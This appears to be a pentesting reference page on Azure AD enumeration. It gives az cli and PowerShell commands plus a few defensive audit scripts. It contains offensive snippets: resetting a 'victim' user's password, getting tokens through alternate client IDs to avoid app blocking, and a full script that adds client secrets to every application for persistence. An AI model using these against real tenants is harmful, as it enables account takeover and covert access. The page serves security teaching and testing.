Az - AzureAD (AAD)


Basic Information

Azure Active Directory (Azure AD) is Microsoft's cloud-based identity and access management service. It is essential for letting employees sign in and access resources both inside and outside the organization, including Microsoft 365, the Azure portal, and a wide range of other SaaS applications. Azure AD's design centres on providing the core identity services: authentication, authorization, and user management.

Key features of Azure AD include multi-factor authentication and Conditional Access, together with seamless integration into Microsoft's other security services. These features considerably strengthen the security of user identities and help organizations implement and enforce access policies effectively. As a fundamental component of Microsoft's cloud service ecosystem, Azure AD is indispensable for cloud-based management of user identities.

Entities

Enumeration

For this enumeration you can use the az cli tool, the PowerShell module AzureAD (or AzureAD Preview) and the Az PowerShell module.

On Linux you need to install PowerShell Core:

```bash
sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common

# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb

# Update repos
sudo apt-get update
sudo add-apt-repository universe

# Install & start powershell
sudo apt-get install -y powershell
pwsh

# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
```

Differences between modules

  • AzureAD is Microsoft's PowerShell module for managing Azure AD. It does not show all the properties of Azure AD objects and cannot be used to access Azure resource information.

  • Az PowerShell is a module for managing Azure resources from the PowerShell command line.

Connection

```bash
az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity (metadata)
az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With password
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com #With cert

# Request access token (ARM)
az account get-access-token
# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
az account get-access-token --resource-type aad-graph

# If you want to configure some defaults
az configure

# Get user logged-in already
az ad signed-in-user show

# Help
az find "vm" # Find vm commands
az vm -h # Get subcommands
az ad user list --query-examples # Get examples
```

When you log in to Azure with the CLI you are using an Azure application from a tenant that belongs to Microsoft. These applications, like the ones you can create in your own account, have a client ID. You won't see all of them in the list of allowed applications that the console shows, but they are allowed by default.

For example, the application used by the PowerShell scripts to authenticate has the client ID 1950a258-227b-4e31-a9cf-717495945fc2. Even though it doesn't appear in the console, a sysadmin can block that application so users can't use tools that connect through that app.

However, there are other application client IDs that can be used to connect to Azure:

```powershell
# The important part is the ClientId, which identifies the application to login inside Azure

$token = Invoke-Authorize -Credential $credential `
    -ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
    -Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
    -Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
    -Verbose -Debug `
    -InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
    -ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
    -Scope 'openid profile Sites.Read.All User.Read email' `
    -Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
    -Verbose -Debug `
    -InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
    -ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
    -Scope 'openid' `
    -Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
    -Verbose -Debug `
    -InformationAction Continue
```

Users

```bash
# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "test@corp.onmicrosoft.com"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-administrators true --assignee <email>
```
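The checks the az commands above express one filter at a time (cloud-only vs on-prem synced users, "admin" display names, any attribute mentioning "password") can be run in a single pass over the JSON that `az ad user list` prints, which is what a defender reviewing a tenant export would do. This is an added example, not code from the page; the user records below are constructed to look like that output.

```python
"""Triage the JSON printed by `az ad user list` (sample below is constructed)."""
import json

# Constructed sample shaped like `az ad user list` output (Microsoft Graph user objects).
SAMPLE_USERS_JSON = json.dumps([
    {"userPrincipalName": "alice@corp.onmicrosoft.com", "displayName": "Alice Admin",
     "onPremisesSecurityIdentifier": None, "jobTitle": "IT Administrator",
     "extension_info": {"notes": "temp password is Winter2024!"}},
    {"userPrincipalName": "bob@corp.onmicrosoft.com", "displayName": "Bob Builder",
     "onPremisesSecurityIdentifier": "S-1-5-21-111-222-333-1105", "jobTitle": None},
    {"userPrincipalName": "svc-backup@corp.onmicrosoft.com", "displayName": "svc backup",
     "onPremisesSecurityIdentifier": "S-1-5-21-111-222-333-1200",
     "passwordPolicies": "DisablePasswordExpiration"},
])


def _walk(obj, path=""):
    """Yield (dotted_path, value) for every leaf of a nested JSON object."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from _walk(value, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from _walk(value, f"{path}[{i}]")
    else:
        yield path, obj


def triage_users(users_json):
    """Split users into cloud-only / synced, flag admin-like names and 'password' attributes."""
    report = {"cloud_only": [], "synced": [], "admin_like": [], "password_hits": []}
    for user in json.loads(users_json):
        upn = user.get("userPrincipalName")
        # Same split as the onPremisesSecurityIdentifier==null / !=null JMESPath filters.
        bucket = "cloud_only" if user.get("onPremisesSecurityIdentifier") is None else "synced"
        report[bucket].append(upn)
        if "admin" in (user.get("displayName") or "").lower():
            report["admin_like"].append(upn)
        # Equivalent of `findstr /i "password" | findstr /v "null,"`: any non-null leaf
        # whose attribute name or value contains "password", nested attributes included.
        for path, value in _walk(user):
            if value is None:
                continue
            if "password" in path.lower() or "password" in str(value).lower():
                report["password_hits"].append((upn, path, value))
    return report


if __name__ == "__main__":
    print(json.dumps(triage_users(SAMPLE_USERS_JSON), indent=2))
```

Feed it the real export with `az ad user list > users.json` and pass the file contents to `triage_users`.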


```powershell
# Enumerate Users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName
# Get info of 1 user
Get-AzureADUser -ObjectId test@corp.onmicrosoft.com | fl
# Search "admin" users
Get-AzureADUser -SearchString "admin" #Search admin at the beginning of DisplayName or userPrincipalName
Get-AzureADUser -All $true |?{$_.Displayname -match "admin"} #Search "admin" word in DisplayName
# Get all attributes of a user
Get-AzureADUser -ObjectId test@defcorphq.onmicrosoft.com|%{$_.PSObject.Properties.Name}
# Search attributes containing the word "password"
Get-AzureADUser -All $true |%{$Properties = $_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_ -match 'password') {"$($Properties.UserPrincipalName) - $_ - $($Properties.$_)"}}}
# All users from AzureAD
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All users synced from on-prem
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Objects created by a/any user
Get-AzureADUser [-ObjectId <email>] | Get-AzureADUserCreatedObject
# Devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Objects owned by a specific user
Get-AzureADUserOwnedObject -ObjectId test@corp.onmicrosoft.com
# Get groups & roles where the user is a member
Get-AzureADUserMembership -ObjectId 'test@corp.onmicrosoft.com'
# Get devices registered by a user
Get-AzureADUserRegisteredDevice -ObjectId test@defcorphq.onmicrosoft.com
# Apps where a user has a role (role not shown)
Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAppRoleAssignment | fl *
# Get Administrative Units of a user
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }
```

```powershell
# Enumerate users
Get-AzADUser
# Get details of a user
Get-AzADUser -UserPrincipalName test@defcorphq.onmicrosoft.com
# Search user by string
Get-AzADUser -SearchString "admin" #Search at the beginning of DisplayName
Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
```

Change user password

```powershell
$password = "ThisIsTheNewPassword.!123" | ConvertTo-SecureString -AsPlainText -Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set-AzureADUserPassword -Password $password -Verbose
```

MFA & Conditional Access Policies

Adding MFA to every user is highly recommended, but some companies don't set it up, or set it up through Conditional Access so that MFA is only required when logging in from certain locations, browsers, or under certain other conditions. If these policies aren't configured correctly they are prone to bypasses. Check:

Az - Conditional Access Policies / MFA Bypass

Groups

```bash
# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown) - AzureAD PowerShell module
Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *
```


```powershell
# Enumerate Groups
Get-AzureADGroup -All $true
# Get info of 1 group
Get-AzureADGroup -ObjectId <group_id> | fl
# Get "admin" groups
Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin"
Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin"
# Get groups allowing dynamic membership
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
# All groups that are from Azure AD
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All groups that are synced from on-prem (note that security groups are not synced)
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Get members of a group
Get-AzureADGroupMember -ObjectId <group_id>
# Get roles of group
Get-AzureADMSGroup -SearchString "Contoso_Helpdesk_Administrators" #Get group id
Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-b4d1-4055-9c94-320542efd653'"
# Get Administrative Units of a group
$groupObj = Get-AzureADGroup -Filter "displayname eq 'TestGroup'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $groupObj.ObjectId} }
```


```powershell
# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the beginning of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <group_name>
# Get roles of group
Get-AzRoleAssignment -ObjectId <group_id>
```

Add users to a group

Group owners can add new users to the group:

```powershell
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
```

Groups can be dynamic, which basically means that when a user meets certain conditions they are added to the group. Of course, if the conditions are based on attributes that the user can control, this feature can be abused to get into other groups. Check how dynamic groups are abused in the following page:

Az - Dynamic Groups Privesc

Service Principals / Enterprise Applications

What PowerShell terminology calls Service Principals are called Enterprise Applications in the Azure portal (web).

```bash
# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
az ad sp list --all --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad sp list --all --query "[?keyCredentials != null].displayName"
```


```powershell
# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match "103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *
```


```powershell
# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>
```


```powershell
# List applications through the Graph API with a raw token
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value
```

List and add client secrets to every Enterprise Application

```powershell
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
{
<#
    .SYNOPSIS
        Add client secret to the applications.

    .PARAMETER GraphToken
        Pass the Graph API Token

    .EXAMPLE
        PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'

    .LINK
        https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http
        https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http
#>

    [CmdletBinding()]
    param(
        [Parameter(Mandatory=$True)]
        [String]
        $GraphToken = $null
    )

    $AppList = $null
    $AppPassword = $null

    # List All the Applications
    $Params = @{
        "URI"     = "https://graph.microsoft.com/v1.0/applications"
        "Method"  = "GET"
        "Headers" = @{
            "Content-Type"  = "application/json"
            "Authorization" = "Bearer $GraphToken"
        }
    }

    try {
        $AppList = Invoke-RestMethod @Params -UseBasicParsing
    }
    catch { }

    # Add Password in the Application
    if($AppList -ne $null) {
        [System.Collections.ArrayList]$Details = @()

        foreach($App in $AppList.value) {
            $ID = $App.ID
            $psobj = New-Object PSObject

            $Params = @{
                "URI"     = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
                "Method"  = "POST"
                "Headers" = @{
                    "Content-Type"  = "application/json"
                    "Authorization" = "Bearer $GraphToken"
                }
            }

            $Body = @{
                "passwordCredential" = @{
                    "displayName" = "Password"
                }
            }

            try {
                $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
                Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID
                Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId
                Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName
                Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId
                Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText
                $Details.Add($psobj) | Out-Null
            }
            catch {
                Write-Output "Failed to add new client secret to '$($App.displayName)' Application."
            }
        }
        if($Details -ne $null) {
            Write-Output ""
            Write-Output "Client secret added to : "
            Write-Output $Details | fl *
        }
    }
    else {
        Write-Output "Failed to Enumerate the Applications."
    }
}
```
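The script above leaves a trace in every application it touches: a new entry in passwordCredentials whose displayName is "Password" and whose startDateTime is the moment it ran (Graph never returns secretText on a read, only at creation). The following added example, not part of the page, audits the response of the same `GET /v1.0/applications` call for such recently added or generic secrets and for expired certificates; the response below is constructed.

```python
"""Audit GET https://graph.microsoft.com/v1.0/applications output for suspicious credentials."""
import json
from datetime import datetime, timedelta, timezone

# Constructed response in the shape Graph returns (secretText is absent on read).
SAMPLE_APPS_JSON = json.dumps({"value": [
    {"id": "11111111-aaaa-4bbb-8ccc-000000000001", "appId": "22222222-aaaa-4bbb-8ccc-000000000001",
     "displayName": "HR Portal",
     "passwordCredentials": [
         {"keyId": "k1", "displayName": "prod-2023", "startDateTime": "2023-01-10T09:00:00Z",
          "endDateTime": "2025-01-10T09:00:00Z"},
         {"keyId": "k2", "displayName": "Password", "startDateTime": "2024-06-01T14:12:30Z",
          "endDateTime": "2026-06-01T14:12:30Z"}],
     "keyCredentials": []},
    {"id": "11111111-aaaa-4bbb-8ccc-000000000002", "appId": "22222222-aaaa-4bbb-8ccc-000000000002",
     "displayName": "Build Agent",
     "passwordCredentials": [],
     "keyCredentials": [
         {"keyId": "k3", "displayName": "CN=build-agent", "type": "AsymmetricX509Cert",
          "usage": "Verify", "startDateTime": "2022-03-01T00:00:00Z",
          "endDateTime": "2024-03-01T00:00:00Z"}]},
]})


def parse_graph_time(ts):
    """Parse the ISO-8601 UTC timestamps Graph uses (e.g. 2024-06-01T14:12:30Z)."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def audit_app_credentials(apps_json, now=None, recent_days=7):
    """Return one finding per credential that deserves a closer look."""
    now = now or datetime.now(timezone.utc)
    findings = []
    for app in json.loads(apps_json)["value"]:
        creds = ([("secret", c) for c in app.get("passwordCredentials", [])] +
                 [("certificate", c) for c in app.get("keyCredentials", [])])
        for kind, cred in creds:
            start = parse_graph_time(cred["startDateTime"])
            end = parse_graph_time(cred["endDateTime"])
            reasons = []
            # Secrets created in the review window (ignore start dates in the future).
            if timedelta(0) <= now - start <= timedelta(days=recent_days):
                reasons.append(f"added within the last {recent_days} days")
            # The script above hard-codes displayName "Password"; an empty or generic
            # name is a weak signal by itself but worth correlating with the start date.
            if kind == "secret" and (cred.get("displayName") or "").strip().lower() in ("", "password"):
                reasons.append("generic or empty display name")
            if end < now:
                reasons.append("expired but still present")
            if reasons:
                findings.append({"app": app["displayName"], "appId": app["appId"], "kind": kind,
                                 "keyId": cred["keyId"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_app_credentials(SAMPLE_APPS_JSON):
        print(finding)
```

Correlate the keyId of any hit with the "Add service principal credentials" / "Update application – Certificates and secrets management" entries in the Azure AD audit log to find who created it.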

Roles

```bash
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"
```


```powershell
# Get all available role templates
Get-AzureADDirectoryRoleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *
```

```powershell
# Get role definitions on the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>
```


# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

Devices

# If you know how to do this send a PR!


# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Registered users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Get devices managed using Intune (compliant devices)
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device (set $deviceObjId to the device ObjectId; the *MS* cmdlets take -Id, not -ObjectId)
$deviceObjId = "<device-object-id>"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $deviceObjId} }

If a device (VM) is AzureAD joined, users from AzureAD will be able to log in to it. Moreover, if the logged-in user is the owner of the device, he will be a local admin.

Applications

Apps are App Registrations in the portal (not Enterprise Applications). However, each App Registration creates an Enterprise Application (Service Principal) with the same name. Moreover, if the App is a multi-tenant App, another Enterprise App (Service Principal) with the same name is created in the other tenant.

When an App is generated, 2 types of permissions are given:

  • Permissions given to the Service Principal

  • Permissions the app can have and use on behalf of the user

# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad app list --query "[?keyCredentials != null].displayName"


# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id>  | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *


# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential

An App with the AppRoleAssignment.ReadWrite permission can escalate to Global Admin by granting itself the role. Check this for more details.

The application password is a secret string that the application uses to prove its identity when requesting a token. Therefore, if you find this password you can access the tenant as that service principal. Note that this password is only visible when it is generated (you can change it, but you cannot retrieve it again). The owner of the application can add a password to it (and can therefore impersonate that application). Logins as these service principals are not marked as risky and have no MFA.
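From the defender's side of the application-password point above, an added example that is not HackTricks' own code: a PowerShell function that takes app registration objects shaped like Get-AzureADApplication output and flags expired or long-lived password and certificate credentials. Find-RiskyAppCredentials, the MaxLifetimeDays threshold and the sample apps are constructed for this example.

```powershell
# Added example, not HackTricks code: flag expired or long-lived app credentials.
# Runs offline on the constructed sample below; for a live tenant pipe
# Get-AzureADApplication -All $true (after Connect-AzureAD) into the function.
function Find-RiskyAppCredentials {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $App,   # shaped like an AzureAD Application object
        [int]$MaxLifetimeDays = 365                       # hypothetical policy threshold
    )
    process {
        $now = Get-Date
        $creds = @()
        foreach ($c in @($App.PasswordCredentials)) { if ($c) { $creds += @{ Type = 'Password';    Cred = $c } } }
        foreach ($c in @($App.KeyCredentials))      { if ($c) { $creds += @{ Type = 'Certificate'; Cred = $c } } }
        foreach ($entry in $creds) {
            $c = $entry.Cred
            $lifetime = (New-TimeSpan -Start $c.StartDate -End $c.EndDate).TotalDays
            $finding = if ($c.EndDate -lt $now) { 'Expired: remove it' }
                       elseif ($lifetime -gt $MaxLifetimeDays) { "Lifetime $([int]$lifetime)d exceeds policy" }
            if ($finding) {
                [pscustomobject]@{
                    App = $App.DisplayName; AppId = $App.AppId; CredType = $entry.Type
                    KeyId = $c.KeyId; EndDate = $c.EndDate; Finding = $finding
                }
            }
        }
    }
}

# Constructed sample input (same property names as AzureAD module app objects)
$sampleApps = @(
    [pscustomobject]@{ DisplayName = 'billing-sync'; AppId = '00000000-0000-0000-0000-000000000001'
        PasswordCredentials = @([pscustomobject]@{ KeyId = 'k1'; StartDate = (Get-Date).AddYears(-1); EndDate = (Get-Date).AddYears(9) })
        KeyCredentials = @() }
    [pscustomobject]@{ DisplayName = 'legacy-connector'; AppId = '00000000-0000-0000-0000-000000000002'
        PasswordCredentials = @([pscustomobject]@{ KeyId = 'k2'; StartDate = (Get-Date).AddYears(-3); EndDate = (Get-Date).AddDays(-10) })
        KeyCredentials = @([pscustomobject]@{ KeyId = 'k3'; StartDate = (Get-Date); EndDate = (Get-Date).AddMonths(6) }) }
)
$sampleApps | Find-RiskyAppCredentials | Format-Table -AutoSize
```

Findings point at credentials to remove or rotate; pair the list with Get-AzureADApplicationOwner output from the block above to see who could have minted each secret.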

Difference between Applications and (Enterprise Applications or Service Principals)

Difference between an Application and a Service Principal in Azure:

  • Application / Application Registration: the application that exists in Azure AD

  • (Get-AzureADApplication -filter "DisplayName eq 'testapp'")

  • Service Principal / Enterprise Application: a security object in Azure AD that can hold privileges in the Azure directory and is linked to your own application or to a third-party application

  • (Get-AzureADServicePrincipal -filter "DisplayName eq 'testapp'")

  • An admin may need to approve the permissions granted if they are very sensitive.

An application may be run by a third-party tenant; once you start using it and grant it access, an Enterprise Application / Service Principal is created in your tenant so that it can access the information it needs.

Administrative Units

They are used to manage users more effectively.

An administrative unit restricts permissions to any portion of your organization. For example, you could use administrative units to delegate the Helpdesk Administrator role to regional support specialists so that they can manage only the users in the region they support.

Therefore, roles can be assigned to an administrative unit, and its members can hold that role.


# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members

Azure AD Identity Protection (AIP)

Azure AD Identity Protection (AIP) is a security service that uses automated detection and remediation to protect user identities in Azure Active Directory. AIP continuously monitors user sign-ins and identity configuration for risk and automatically applies appropriate security measures, such as requiring multi-factor authentication or blocking potentially dangerous activity. This helps organizations prevent identity-based security breaches.

Flow:

  1. Azure AD Identity Protection monitors user activity and collects data such as user sign-ins and authentication events.

  2. The service analyzes this data with machine learning algorithms to detect potential security threats.

  3. Azure AD Identity Protection assigns a risk level to the threat (for example, a sign-in) and, if necessary, generates an alert and takes automatic action.

Azure AD Password Protection (APP)

Azure AD Password Protection (APP) is a security feature that prevents weak passwords by enforcing strong password policies in Azure Active Directory. APP blocks commonly used weak passwords and their variants, reducing the risk of password-related breaches. It can be applied both at the cloud level and in on-premises Active Directory, improving password security across the organization.
